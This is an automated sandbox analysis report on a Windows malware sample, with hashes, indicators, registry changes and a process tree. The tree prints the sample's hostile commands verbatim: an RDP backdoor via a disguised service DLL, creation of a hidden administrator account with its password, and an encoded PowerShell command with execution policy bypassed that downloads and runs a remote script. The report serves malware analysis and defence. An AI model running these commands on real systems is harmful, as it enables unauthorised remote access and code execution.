Analysis
-
max time kernel
61s -
max time network
115s -
platform
windows10_x64 -
resource
win10v20210408 -
submitted
11-08-2021 08:09
Static task
static1
Behavioral task
behavioral1
Sample
bfe0ac25eeeb759f7c8e06229c7313a2.exe
Resource
win7v20210408
Behavioral task
behavioral2
Sample
bfe0ac25eeeb759f7c8e06229c7313a2.exe
Resource
win10v20210408
General
-
Target
bfe0ac25eeeb759f7c8e06229c7313a2.exe
-
Size
5.9MB
-
MD5
bfe0ac25eeeb759f7c8e06229c7313a2
-
SHA1
199c1fbd29f9ec98b83464763dac63ef80998bb3
-
SHA256
be9c5e5ce6d4544e6bddbd47c26873fe0c33414086824b1d4968a638184a8a7c
-
SHA512
a0f3b477de1603d7e032608692857a4865059ba61ae1276334f281970a1484a6c81463fba2a2bbc9821c016e06e206d621fdb97e8743fc60e3515fba88997a72
Malware Config
Extracted
https://raw.githubusercontent.com/sqlitey/sqlite/master/speed.ps1
Signatures
-
Grants admin privileges 1 TTPs
Uses net.exe to modify the user's privileges.
-
Blocklisted process makes network request 9 IoCs
Processes:
powershell.exeflow pid process 18 2268 powershell.exe 20 2268 powershell.exe 21 2268 powershell.exe 22 2268 powershell.exe 24 2268 powershell.exe 26 2268 powershell.exe 28 2268 powershell.exe 30 2268 powershell.exe 32 2268 powershell.exe -
Modifies RDP port number used by Windows 1 TTPs
-
Sets DLL path for service in the registry 2 TTPs
-
Processes:
resource yara_rule \Windows\Branding\mediasrv.png upx \Windows\Branding\mediasvc.png upx -
Loads dropped DLL 2 IoCs
Processes:
pid process 1212 1212 -
Drops file in Program Files directory 4 IoCs
Processes:
powershell.exedescription ioc process File opened for modification C:\Program Files\Uninstall Information\IE40.UserAgent\IE40.UserAgent.DAT powershell.exe File opened for modification C:\Program Files\Uninstall Information\IE40.UserAgent\IE40.UserAgent.INI powershell.exe File opened for modification C:\Program Files\Uninstall Information\IE.HKCUZoneInfo\IE.HKCUZoneInfo.DAT powershell.exe File opened for modification C:\Program Files\Uninstall Information\IE.HKCUZoneInfo\IE.HKCUZoneInfo.INI powershell.exe -
Drops file in Windows directory 19 IoCs
Processes:
powershell.exepowershell.exedescription ioc process File created C:\Windows\branding\mediasrv.png powershell.exe File created C:\Windows\ServiceProfiles\NetworkService\AppData\Local\Temp\__PSScriptPolicyTest_p4tmh1ws.2qz.psm1 powershell.exe File opened for modification C:\Windows\SERVIC~2\NETWOR~1\AppData\Local\Temp\RGIF320.tmp powershell.exe File opened for modification C:\Windows\SERVIC~2\NETWOR~1\AppData\Local\Temp\RGIF3AE.tmp powershell.exe File opened for modification C:\Windows\SERVIC~2\NETWOR~1\AppData\Local\Temp\RGIF3EE.tmp powershell.exe File opened for modification C:\Windows\ServiceProfiles\NetworkService\AppData\Local\Microsoft\Windows\INetCache\counters2.dat powershell.exe File created C:\Windows\ServiceProfiles\NetworkService\AppData\Local\Microsoft\CLR_v4.0\UsageLogs\powershell.exe.log powershell.exe File opened for modification C:\Windows\branding\Basebrd powershell.exe File opened for modification C:\Windows\branding\mediasrv.png powershell.exe File opened for modification C:\Windows\branding\mediasvc.png powershell.exe File opened for modification C:\Windows\branding\wupsvc.jpg powershell.exe File created C:\Windows\ServiceProfiles\NetworkService\AppData\Local\Temp\__PSScriptPolicyTest_zkedwb32.zpm.ps1 powershell.exe File created C:\Windows\ServiceProfiles\NetworkService\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive powershell.exe File created C:\Windows\branding\wupsvc.jpg powershell.exe File opened for modification C:\Windows\branding\ShellBrd powershell.exe File created C:\Windows\SERVIC~2\NETWOR~1\AppData\Local\Temp\TMP4352$.TMP powershell.exe File opened for modification C:\Windows\SERVIC~2\NETWOR~1\AppData\Local\Temp\RGIF38E.tmp powershell.exe File opened for modification C:\Windows\SERVIC~2\NETWOR~1\AppData\Local\Temp\RGIF3FF.tmp powershell.exe File created C:\Windows\branding\mediasvc.png powershell.exe -
Modifies data under HKEY_USERS 64 IoCs
Processes:
powershell.exedescription ioc process Set value (str) \REGISTRY\USER\S-1-5-20\Software\Microsoft\Windows\CurrentVersion\Internet Settings\IE5_UA_Backup_Flag = "5.0" powershell.exe Set value (str) \REGISTRY\USER\S-1-5-20\Software\Microsoft\Windows\CurrentVersion\Internet Settings\Lockdown_Zones\2\DisplayName = "Trusted sites" powershell.exe Set value (int) \REGISTRY\USER\S-1-5-20\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap\IntranetName = "1" powershell.exe Key created \REGISTRY\USER\S-1-5-20\Software\Policies\Microsoft\SystemCertificates\CA\Certificates powershell.exe Key created \REGISTRY\USER\S-1-5-20\Software\Microsoft\Windows\CurrentVersion\Internet Settings\Zones\2 powershell.exe Set value (int) \REGISTRY\USER\S-1-5-20\Software\Microsoft\Windows\CurrentVersion\Internet Settings\Zones\0\1200 = "0" powershell.exe Set value (str) \REGISTRY\USER\S-1-5-20\Software\Microsoft\Windows\CurrentVersion\Internet Settings\Lockdown_Zones\3\Icon = "inetcpl.cpl#001313" powershell.exe Key created \REGISTRY\USER\S-1-5-20\Software\Microsoft\Windows\CurrentVersion\WinTrust\Trust Providers\Software Publishing powershell.exe Key created \REGISTRY\USER\S-1-5-20\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap\ powershell.exe Set value (str) \REGISTRY\USER\S-1-5-20\Software\Microsoft\Windows\CurrentVersion\Internet Settings\Zones\3\ powershell.exe Set value (str) \REGISTRY\USER\S-1-5-20\Software\Microsoft\Windows\CurrentVersion\Internet Settings\Lockdown_Zones\0\Description = "Your computer" powershell.exe Set value (str) \REGISTRY\USER\S-1-5-20\Software\Microsoft\Windows\CurrentVersion\Internet Settings\Lockdown_Zones\1\ powershell.exe Set value (str) \REGISTRY\USER\S-1-5-20\Software\Microsoft\Windows\CurrentVersion\Internet Settings\Lockdown_Zones\3\Description = "This zone contains all Web sites you haven't placed in other zones" powershell.exe Set value (int) \REGISTRY\USER\S-1-5-20\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap\IntranetName = "0" powershell.exe Key created \REGISTRY\USER\S-1-5-20\Software\Microsoft\Windows\CurrentVersion\Internet Settings\Zones\0 powershell.exe Set value (int) \REGISTRY\USER\S-1-5-20\Software\Microsoft\Windows\CurrentVersion\Internet Settings\Lockdown_Zones\4\1200 = "3" powershell.exe Key created \REGISTRY\USER\S-1-5-20\Software\Microsoft\SystemCertificates\trust\CTLs powershell.exe Key created \REGISTRY\USER\S-1-5-20\Software\Classes\Local Settings\MuiCache\16\52C64B7E powershell.exe Set value (int) \REGISTRY\USER\S-1-5-20\Software\Microsoft\Windows\CurrentVersion\Internet Settings\Zones\2\Flags = "71" powershell.exe Set value (int) \REGISTRY\USER\S-1-5-20\Software\Microsoft\Windows\CurrentVersion\Internet Settings\Lockdown_Zones\4\Flags = "33" powershell.exe Set value (int) \REGISTRY\USER\S-1-5-20\Software\Microsoft\Windows\CurrentVersion\Internet Settings\Zones\3\1200 = "0" powershell.exe Set value (int) \REGISTRY\USER\S-1-5-20\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap\AutoDetect = "1" powershell.exe Key created \REGISTRY\USER\S-1-5-20\Software\Policies\Microsoft\SystemCertificates\Disallowed\Certificates powershell.exe Set value (int) \REGISTRY\USER\S-1-5-20\Software\Microsoft\Windows\CurrentVersion\Internet Settings\Zones\0\1400 = "0" powershell.exe Key created \REGISTRY\USER\S-1-5-20\Software\Microsoft\Advanced INF Setup\IE.HKCUZoneInfo\RegBackup powershell.exe Set value (str) \REGISTRY\USER\S-1-5-20\Software\Microsoft\Windows\CurrentVersion\Internet Settings\Zones\2\Description = "This zone contains Web sites that you trust not to damage your computer or data." powershell.exe Set value (str) \REGISTRY\USER\S-1-5-20\Software\Microsoft\Windows\CurrentVersion\Internet Settings\Zones\4\ powershell.exe Key created \REGISTRY\USER\S-1-5-20\Software\Microsoft\SystemCertificates\TrustedPeople powershell.exe Set value (str) \REGISTRY\USER\S-1-5-20\Software\Microsoft\Windows\CurrentVersion\Internet Settings\Zones\3\Description = "This zone contains all Web sites you haven't placed in other zones" powershell.exe Set value (int) \REGISTRY\USER\S-1-5-20\Software\Microsoft\Windows\CurrentVersion\Internet Settings\Lockdown_Zones\1\Flags = "219" powershell.exe Key created \REGISTRY\USER\S-1-5-20\Software\Microsoft\SystemCertificates\CA powershell.exe Key created \REGISTRY\USER\S-1-5-20\Software\Microsoft\SystemCertificates\Root\Certificates powershell.exe Key created \REGISTRY\USER\S-1-5-20\Software\Microsoft\SystemCertificates\SmartCardRoot\CTLs powershell.exe Key created \REGISTRY\USER\S-1-5-20\Software\Microsoft\Advanced INF Setup\IE40.UserAgent powershell.exe Key created \REGISTRY\USER\S-1-5-20\Software\Policies\Microsoft\SystemCertificates\CA\CTLs powershell.exe Key created \REGISTRY\USER\S-1-5-20\Software\Policies\Microsoft\SystemCertificates\TrustedPeople\Certificates powershell.exe Key created \REGISTRY\USER\S-1-5-20\Software\Microsoft\Windows\CurrentVersion\Internet Settings\Lockdown_Zones\4 powershell.exe Set value (int) \REGISTRY\USER\S-1-5-20\Software\Microsoft\Windows\CurrentVersion\Internet Settings\Lockdown_Zones\1\1400 = "1" powershell.exe Key created \REGISTRY\USER\S-1-5-20\SOFTWARE\Microsoft\Windows\CurrentVersion\OnDemandInterfaceCache powershell.exe Key created \REGISTRY\USER\S-1-5-20\Software powershell.exe Set value (int) \REGISTRY\USER\S-1-5-20\Software\Microsoft\Windows\CurrentVersion\Internet Settings\Zones\1\1400 = "0" powershell.exe Key created \REGISTRY\USER\S-1-5-20\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap powershell.exe Set value (str) \REGISTRY\USER\S-1-5-20\Software\Microsoft\Windows\CurrentVersion\Internet Settings\Zones\4\Icon = "inetcpl.cpl#00004481" powershell.exe Set value (str) \REGISTRY\USER\S-1-5-20\Software\Microsoft\Windows\CurrentVersion\Internet Settings\Lockdown_Zones\4\Description = "This zone contains Web sites that could potentially damage your computer or data." powershell.exe Set value (int) \REGISTRY\USER\S-1-5-20\Software\Microsoft\Windows\CurrentVersion\Internet Settings\Lockdown_Zones\0\1200 = "3" powershell.exe Set value (int) \REGISTRY\USER\S-1-5-20\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap\ProtocolDefaults\@ivt = "1" powershell.exe Set value (str) \REGISTRY\USER\S-1-5-20\Software\Microsoft\Windows\CurrentVersion\Internet Settings\Zones\0\DisplayName = "Computer" powershell.exe Key created \REGISTRY\USER\S-1-5-20\Software\Policies\Microsoft\SystemCertificates\trust\CRLs powershell.exe Key created \REGISTRY\USER\S-1-5-20\Software\Microsoft\windows\CurrentVersion\Internet Settings\Connections powershell.exe Set value (str) \REGISTRY\USER\S-1-5-20\Software\Microsoft\Windows\CurrentVersion\Internet Settings\Zones\0\DisplayName = "My Computer" powershell.exe Set value (str) \REGISTRY\USER\S-1-5-20\Software\Microsoft\Windows\CurrentVersion\Internet Settings\Lockdown_Zones\4\PMDisplayName = "Restricted sites [Protected Mode]" powershell.exe Set value (int) \REGISTRY\USER\S-1-5-20\Software\Microsoft\Windows\CurrentVersion\Internet Settings\Zones\2\1400 = "0" powershell.exe Set value (int) \REGISTRY\USER\S-1-5-20\Software\Microsoft\Windows\CurrentVersion\Internet Settings\Lockdown_Zones\1\1200 = "3" powershell.exe Key created \REGISTRY\USER\S-1-5-20\Software\Microsoft\SystemCertificates\Root\CRLs powershell.exe Set value (int) \REGISTRY\USER\S-1-5-20\Software\Microsoft\Windows\CurrentVersion\Internet Settings\Zones\3\Flags = "1" powershell.exe Set value (int) \REGISTRY\USER\S-1-5-20\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap\ProtocolDefaults\http = "3" powershell.exe Key created \REGISTRY\USER\S-1-5-20\Software\Microsoft\SystemCertificates\Disallowed\Certificates powershell.exe Key created \REGISTRY\USER\S-1-5-20\Software\Microsoft\SystemCertificates\TrustedPeople\Certificates powershell.exe Set value (str) \REGISTRY\USER\S-1-5-20\Software\Microsoft\Windows\CurrentVersion\Internet Settings\Lockdown_Zones\0\DisplayName = "My Computer" powershell.exe Set value (str) \REGISTRY\USER\S-1-5-20\Software\Microsoft\Windows\CurrentVersion\Internet Settings\Lockdown_Zones\3\ powershell.exe Set value (int) \REGISTRY\USER\S-1-5-20\Software\Microsoft\Windows\CurrentVersion\Internet Settings\Zones\1\2500 = "3" powershell.exe Key created \REGISTRY\USER\S-1-5-20\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap\Ranges powershell.exe Key created \REGISTRY\USER\S-1-5-20\Software\Microsoft\Advanced INF Setup\IE.HKCUZoneInfo powershell.exe Set value (str) \REGISTRY\USER\S-1-5-20\Software\Microsoft\Windows\CurrentVersion\Internet Settings\Zones\2\PMDisplayName = "Trusted sites [Protected Mode]" powershell.exe -
Modifies registry key 1 TTPs 1 IoCs
-
Runs net.exe
-
Script User-Agent 4 IoCs
Uses user-agent string associated with script host/environment.
Processes:
description flow ioc HTTP User-Agent header 20 Mozilla/4.0 (compatible; Win32; WinHttp.WinHttpRequest.5) HTTP User-Agent header 21 Mozilla/4.0 (compatible; Win32; WinHttp.WinHttpRequest.5) HTTP User-Agent header 22 Mozilla/4.0 (compatible; Win32; WinHttp.WinHttpRequest.5) HTTP User-Agent header 24 Mozilla/4.0 (compatible; Win32; WinHttp.WinHttpRequest.5) -
Suspicious behavior: EnumeratesProcesses 18 IoCs
Processes:
powershell.exepowershell.exepowershell.exepowershell.exepowershell.exepid process 996 powershell.exe 996 powershell.exe 996 powershell.exe 3880 powershell.exe 3880 powershell.exe 3880 powershell.exe 1144 powershell.exe 1144 powershell.exe 1144 powershell.exe 3976 powershell.exe 3976 powershell.exe 3976 powershell.exe 996 powershell.exe 996 powershell.exe 996 powershell.exe 2268 powershell.exe 2268 powershell.exe 2268 powershell.exe -
Suspicious behavior: LoadsDriver 2 IoCs
Processes:
pid process 624 624 -
Suspicious use of AdjustPrivilegeToken 64 IoCs
Processes:
bfe0ac25eeeb759f7c8e06229c7313a2.exepowershell.exepowershell.exepowershell.exepowershell.exedescription pid process Token: SeDebugPrivilege 1032 bfe0ac25eeeb759f7c8e06229c7313a2.exe Token: SeDebugPrivilege 996 powershell.exe Token: SeDebugPrivilege 3880 powershell.exe Token: SeIncreaseQuotaPrivilege 3880 powershell.exe Token: SeSecurityPrivilege 3880 powershell.exe Token: SeTakeOwnershipPrivilege 3880 powershell.exe Token: SeLoadDriverPrivilege 3880 powershell.exe Token: SeSystemProfilePrivilege 3880 powershell.exe Token: SeSystemtimePrivilege 3880 powershell.exe Token: SeProfSingleProcessPrivilege 3880 powershell.exe Token: SeIncBasePriorityPrivilege 3880 powershell.exe Token: SeCreatePagefilePrivilege 3880 powershell.exe Token: SeBackupPrivilege 3880 powershell.exe Token: SeRestorePrivilege 3880 powershell.exe Token: SeShutdownPrivilege 3880 powershell.exe Token: SeDebugPrivilege 3880 powershell.exe Token: SeSystemEnvironmentPrivilege 3880 powershell.exe Token: SeRemoteShutdownPrivilege 3880 powershell.exe Token: SeUndockPrivilege 3880 powershell.exe Token: SeManageVolumePrivilege 3880 powershell.exe Token: 33 3880 powershell.exe Token: 34 3880 powershell.exe Token: 35 3880 powershell.exe Token: 36 3880 powershell.exe Token: SeDebugPrivilege 1144 powershell.exe Token: SeIncreaseQuotaPrivilege 1144 powershell.exe Token: SeSecurityPrivilege 1144 powershell.exe Token: SeTakeOwnershipPrivilege 1144 powershell.exe Token: SeLoadDriverPrivilege 1144 powershell.exe Token: SeSystemProfilePrivilege 1144 powershell.exe Token: SeSystemtimePrivilege 1144 powershell.exe Token: SeProfSingleProcessPrivilege 1144 powershell.exe Token: SeIncBasePriorityPrivilege 1144 powershell.exe Token: SeCreatePagefilePrivilege 1144 powershell.exe Token: SeBackupPrivilege 1144 powershell.exe Token: SeRestorePrivilege 1144 powershell.exe Token: SeShutdownPrivilege 1144 powershell.exe Token: SeDebugPrivilege 1144 powershell.exe Token: SeSystemEnvironmentPrivilege 1144 powershell.exe Token: SeRemoteShutdownPrivilege 1144 powershell.exe Token: SeUndockPrivilege 1144 powershell.exe Token: SeManageVolumePrivilege 1144 powershell.exe Token: 33 1144 powershell.exe Token: 34 1144 powershell.exe Token: 35 1144 powershell.exe Token: 36 1144 powershell.exe Token: SeDebugPrivilege 3976 powershell.exe Token: SeIncreaseQuotaPrivilege 3976 powershell.exe Token: SeSecurityPrivilege 3976 powershell.exe Token: SeTakeOwnershipPrivilege 3976 powershell.exe Token: SeLoadDriverPrivilege 3976 powershell.exe Token: SeSystemProfilePrivilege 3976 powershell.exe Token: SeSystemtimePrivilege 3976 powershell.exe Token: SeProfSingleProcessPrivilege 3976 powershell.exe Token: SeIncBasePriorityPrivilege 3976 powershell.exe Token: SeCreatePagefilePrivilege 3976 powershell.exe Token: SeBackupPrivilege 3976 powershell.exe Token: SeRestorePrivilege 3976 powershell.exe Token: SeShutdownPrivilege 3976 powershell.exe Token: SeDebugPrivilege 3976 powershell.exe Token: SeSystemEnvironmentPrivilege 3976 powershell.exe Token: SeRemoteShutdownPrivilege 3976 powershell.exe Token: SeUndockPrivilege 3976 powershell.exe Token: SeManageVolumePrivilege 3976 powershell.exe -
Suspicious use of WriteProcessMemory 64 IoCs
Processes:
bfe0ac25eeeb759f7c8e06229c7313a2.exepowershell.execsc.exenet.execmd.execmd.exenet.execmd.execmd.exenet.execmd.exenet.execmd.exenet.execmd.exenet.execmd.exenet.execmd.exenet.execmd.exenet.execmd.exedescription pid process target process PID 1032 wrote to memory of 996 1032 bfe0ac25eeeb759f7c8e06229c7313a2.exe powershell.exe PID 1032 wrote to memory of 996 1032 bfe0ac25eeeb759f7c8e06229c7313a2.exe powershell.exe PID 996 wrote to memory of 808 996 powershell.exe csc.exe PID 996 wrote to memory of 808 996 powershell.exe csc.exe PID 808 wrote to memory of 2104 808 csc.exe cvtres.exe PID 808 wrote to memory of 2104 808 csc.exe cvtres.exe PID 996 wrote to memory of 3880 996 powershell.exe powershell.exe PID 996 wrote to memory of 3880 996 powershell.exe powershell.exe PID 996 wrote to memory of 1144 996 powershell.exe powershell.exe PID 996 wrote to memory of 1144 996 powershell.exe powershell.exe PID 996 wrote to memory of 3976 996 powershell.exe powershell.exe PID 996 wrote to memory of 3976 996 powershell.exe powershell.exe PID 996 wrote to memory of 3868 996 powershell.exe reg.exe PID 996 wrote to memory of 3868 996 powershell.exe reg.exe PID 996 wrote to memory of 4004 996 powershell.exe reg.exe PID 996 wrote to memory of 4004 996 powershell.exe reg.exe PID 996 wrote to memory of 904 996 powershell.exe reg.exe PID 996 wrote to memory of 904 996 powershell.exe reg.exe PID 996 wrote to memory of 3176 996 powershell.exe net.exe PID 996 wrote to memory of 3176 996 powershell.exe net.exe PID 3176 wrote to memory of 1144 3176 net.exe net1.exe PID 3176 wrote to memory of 1144 3176 net.exe net1.exe PID 996 wrote to memory of 2364 996 powershell.exe cmd.exe PID 996 wrote to memory of 2364 996 powershell.exe cmd.exe PID 2364 wrote to memory of 1344 2364 cmd.exe cmd.exe PID 2364 wrote to memory of 1344 2364 cmd.exe cmd.exe PID 1344 wrote to memory of 2192 1344 cmd.exe net.exe PID 1344 wrote to memory of 2192 1344 cmd.exe net.exe PID 2192 wrote to memory of 2256 2192 net.exe net1.exe PID 2192 wrote to memory of 2256 2192 net.exe net1.exe PID 996 wrote to memory of 3756 996 powershell.exe cmd.exe PID 996 wrote to memory of 3756 996 powershell.exe cmd.exe PID 3756 wrote to memory of 1304 3756 cmd.exe cmd.exe PID 3756 wrote to memory of 1304 3756 cmd.exe cmd.exe PID 1304 wrote to memory of 3748 1304 cmd.exe net.exe PID 1304 wrote to memory of 3748 1304 cmd.exe net.exe PID 3748 wrote to memory of 3112 3748 net.exe net1.exe PID 3748 wrote to memory of 3112 3748 net.exe net1.exe PID 3724 wrote to memory of 2112 3724 cmd.exe net.exe PID 3724 wrote to memory of 2112 3724 cmd.exe net.exe PID 2112 wrote to memory of 3176 2112 net.exe net1.exe PID 2112 wrote to memory of 3176 2112 net.exe net1.exe PID 3184 wrote to memory of 1244 3184 cmd.exe net.exe PID 3184 wrote to memory of 1244 3184 cmd.exe net.exe PID 1244 wrote to memory of 1340 1244 net.exe net1.exe PID 1244 wrote to memory of 1340 1244 net.exe net1.exe PID 804 wrote to memory of 3840 804 cmd.exe net.exe PID 804 wrote to memory of 3840 804 cmd.exe net.exe PID 3840 wrote to memory of 2844 3840 net.exe net1.exe PID 3840 wrote to memory of 2844 3840 net.exe net1.exe PID 3176 wrote to memory of 2164 3176 cmd.exe net.exe PID 3176 wrote to memory of 2164 3176 cmd.exe net.exe PID 2164 wrote to memory of 2252 2164 net.exe net1.exe PID 2164 wrote to memory of 2252 2164 net.exe net1.exe PID 2192 wrote to memory of 904 2192 cmd.exe net.exe PID 2192 wrote to memory of 904 2192 cmd.exe net.exe PID 904 wrote to memory of 2272 904 net.exe net1.exe PID 904 wrote to memory of 2272 904 net.exe net1.exe PID 3960 wrote to memory of 3008 3960 cmd.exe net.exe PID 3960 wrote to memory of 3008 3960 cmd.exe net.exe PID 3008 wrote to memory of 3188 3008 net.exe net1.exe PID 3008 wrote to memory of 3188 3008 net.exe net1.exe PID 2268 wrote to memory of 4004 2268 cmd.exe WMIC.exe PID 2268 wrote to memory of 4004 2268 cmd.exe WMIC.exe
Processes
-
C:\Users\Admin\AppData\Local\Temp\bfe0ac25eeeb759f7c8e06229c7313a2.exe"C:\Users\Admin\AppData\Local\Temp\bfe0ac25eeeb759f7c8e06229c7313a2.exe"1⤵
- Suspicious use of AdjustPrivilegeToken
- Suspicious use of WriteProcessMemory
PID:1032 -
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe"powershell.exe" -ep bypass & 'C:\Users\Admin\AppData\Local\Temp\\ready.ps1'2⤵
- Drops file in Windows directory
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
- Suspicious use of WriteProcessMemory
PID:996 -
C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe"C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe" /noconfig /fullpaths @"C:\Users\Admin\AppData\Local\Temp\l5a5vaev\l5a5vaev.cmdline"3⤵
- Suspicious use of WriteProcessMemory
PID:808 -
C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exeC:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe /NOLOGO /READONLY /MACHINE:IX86 "/OUT:C:\Users\Admin\AppData\Local\Temp\RES9204.tmp" "c:\Users\Admin\AppData\Local\Temp\l5a5vaev\CSC41B3D41B62A4A5CA5DF6D399998BF0.TMP"4⤵PID:2104
-
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -Version 5.1 -s -NoLogo -NoProfile3⤵
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
PID:3880 -
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -Version 5.1 -s -NoLogo -NoProfile3⤵
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
PID:1144 -
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -Version 5.1 -s -NoLogo -NoProfile3⤵
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
PID:3976 -
C:\Windows\system32\reg.exe"C:\Windows\system32\reg.exe" ADD "HKLM\System\CurrentControlSet\Control\Terminal Server\WinStations\RDP-Tcp" /v PortNumber /t REG_DWORD /d 0x1C21 /f3⤵PID:3868
-
C:\Windows\system32\reg.exe"C:\Windows\system32\reg.exe" add HKLM\system\currentcontrolset\services\TermService\parameters /v ServiceDLL /t REG_EXPAND_SZ /d C:\Windows\branding\mediasrv.png /f3⤵
- Modifies registry key
PID:4004 -
C:\Windows\system32\reg.exe"C:\Windows\system32\reg.exe" add "HKLM\SOFTWARE\Policies\Microsoft\Windows NT\Terminal Services" /v fEnableWddmDriver /t reg_dword /d 0 /f3⤵PID:904
-
C:\Windows\system32\net.exe"C:\Windows\system32\net.exe" localgroup Administrators "NT AUTHORITY\NETWORK SERVICE" /add3⤵
- Suspicious use of WriteProcessMemory
PID:3176 -
C:\Windows\system32\net1.exeC:\Windows\system32\net1 localgroup Administrators "NT AUTHORITY\NETWORK SERVICE" /add4⤵PID:1144
-
C:\Windows\system32\cmd.exe"C:\Windows\system32\cmd.exe" /c cmd /c net start rdpdr3⤵
- Suspicious use of WriteProcessMemory
PID:2364 -
C:\Windows\system32\cmd.execmd /c net start rdpdr4⤵
- Suspicious use of WriteProcessMemory
PID:1344 -
C:\Windows\system32\net.exenet start rdpdr5⤵
- Suspicious use of WriteProcessMemory
PID:2192 -
C:\Windows\system32\net1.exeC:\Windows\system32\net1 start rdpdr6⤵PID:2256
-
C:\Windows\system32\cmd.exe"C:\Windows\system32\cmd.exe" /c cmd /c net start TermService3⤵
- Suspicious use of WriteProcessMemory
PID:3756 -
C:\Windows\system32\cmd.execmd /c net start TermService4⤵
- Suspicious use of WriteProcessMemory
PID:1304 -
C:\Windows\system32\net.exenet start TermService5⤵
- Suspicious use of WriteProcessMemory
PID:3748 -
C:\Windows\system32\net1.exeC:\Windows\system32\net1 start TermService6⤵PID:3112
-
C:\Windows\system32\cmd.exe"C:\Windows\system32\cmd.exe" /c del %temp%\*.ps1 /f3⤵PID:2332
-
C:\Windows\system32\cmd.exe"C:\Windows\system32\cmd.exe" /c del %temp%\*.txt /f3⤵PID:2756
-
C:\Windows\System32\cmd.execmd /C net.exe user WgaUtilAcc 000000 /del1⤵
- Suspicious use of WriteProcessMemory
PID:3724 -
C:\Windows\system32\net.exenet.exe user WgaUtilAcc 000000 /del2⤵
- Suspicious use of WriteProcessMemory
PID:2112 -
C:\Windows\system32\net1.exeC:\Windows\system32\net1 user WgaUtilAcc 000000 /del3⤵PID:3176
-
C:\Windows\System32\cmd.execmd /C net.exe user WgaUtilAcc k85dqMSN /add1⤵
- Suspicious use of WriteProcessMemory
PID:3184 -
C:\Windows\system32\net.exenet.exe user WgaUtilAcc k85dqMSN /add2⤵
- Suspicious use of WriteProcessMemory
PID:1244 -
C:\Windows\system32\net1.exeC:\Windows\system32\net1 user WgaUtilAcc k85dqMSN /add3⤵PID:1340
-
C:\Windows\System32\cmd.execmd /C net.exe LOCALGROUP "Remote Desktop Users" WgaUtilAcc /ADD1⤵
- Suspicious use of WriteProcessMemory
PID:804 -
C:\Windows\system32\net.exenet.exe LOCALGROUP "Remote Desktop Users" WgaUtilAcc /ADD2⤵
- Suspicious use of WriteProcessMemory
PID:3840 -
C:\Windows\system32\net1.exeC:\Windows\system32\net1 LOCALGROUP "Remote Desktop Users" WgaUtilAcc /ADD3⤵PID:2844
-
C:\Windows\System32\cmd.execmd /C net.exe LOCALGROUP "Remote Desktop Users" GFBFPSXA$ /ADD1⤵
- Suspicious use of WriteProcessMemory
PID:3176 -
C:\Windows\system32\net.exenet.exe LOCALGROUP "Remote Desktop Users" GFBFPSXA$ /ADD2⤵
- Suspicious use of WriteProcessMemory
PID:2164 -
C:\Windows\system32\net1.exeC:\Windows\system32\net1 LOCALGROUP "Remote Desktop Users" GFBFPSXA$ /ADD3⤵PID:2252
-
C:\Windows\System32\cmd.execmd /C net.exe LOCALGROUP "Administrators" WgaUtilAcc /ADD1⤵
- Suspicious use of WriteProcessMemory
PID:2192 -
C:\Windows\system32\net.exenet.exe LOCALGROUP "Administrators" WgaUtilAcc /ADD2⤵
- Suspicious use of WriteProcessMemory
PID:904 -
C:\Windows\system32\net1.exeC:\Windows\system32\net1 LOCALGROUP "Administrators" WgaUtilAcc /ADD3⤵PID:2272
-
C:\Windows\System32\cmd.execmd /C net.exe user WgaUtilAcc k85dqMSN1⤵
- Suspicious use of WriteProcessMemory
PID:3960 -
C:\Windows\system32\net.exenet.exe user WgaUtilAcc k85dqMSN2⤵
- Suspicious use of WriteProcessMemory
PID:3008 -
C:\Windows\system32\net1.exeC:\Windows\system32\net1 user WgaUtilAcc k85dqMSN3⤵PID:3188
-
C:\Windows\System32\cmd.execmd.exe /C wmic path win32_VideoController get name1⤵
- Suspicious use of WriteProcessMemory
PID:2268 -
C:\Windows\System32\Wbem\WMIC.exewmic path win32_VideoController get name2⤵PID:4004
-
C:\Windows\System32\cmd.execmd.exe /C wmic CPU get NAME1⤵PID:3176
-
C:\Windows\System32\Wbem\WMIC.exewmic CPU get NAME2⤵PID:3880
-
C:\Windows\System32\cmd.execmd.exe /C cmd /C powershell -ep bypass -NoProfile -outputformat text -nologo -noninteractive -enc SQBFAFgAIAAoAE4AZQB3AC0ATwBiAGoAZQBjAHQAIABOAGUAdAAuAFcAZQBiAGMAbABpAGUAbgB0ACkALgBkAG8AdwBuAGwAbwBhAGQAcwB0AHIAaQBuAGcAKAAiAGgAdAB0AHAAcwA6AC8ALwByAGEAdwAuAGcAaQB0AGgAdQBiAHUAcwBlAHIAYwBvAG4AdABlAG4AdAAuAGMAbwBtAC8AcwBxAGwAaQB0AGUAeQAvAHMAcQBsAGkAdABlAC8AbQBhAHMAdABlAHIALwBzAHAAZQBlAGQALgBwAHMAMQAiACkA1⤵PID:1680
-
